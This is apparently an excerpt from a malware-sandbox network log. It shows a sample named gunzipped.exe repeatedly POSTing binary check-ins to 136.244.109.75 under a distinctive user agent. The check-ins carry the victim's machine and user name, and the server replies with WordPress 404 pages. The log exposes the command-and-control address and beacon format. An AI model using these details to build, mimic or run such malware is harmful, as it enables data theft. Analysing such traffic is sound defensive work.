                          Apr 17, 2024 03:18:49.029567957 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          77192.168.2.549791136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:49.380265951 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:49.588119030 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:50.517529964 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:49 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:50.517565012 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:50.517585039 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:50.517602921 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:50.517623901 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:50.517642021 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:50.517662048 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:50.517680883 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:50.517699957 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:50.517720938 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          78192.168.2.549792136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:50.868000984 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:51.075810909 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:52.030656099 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:50 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:52.030715942 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:52.030755043 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:52.030795097 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:52.030833960 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:52.030874014 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:52.030915976 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:52.030955076 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:52.030992985 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:52.031032085 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          79192.168.2.549793136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:52.381113052 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:52.589148998 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:53.502126932 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:52 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
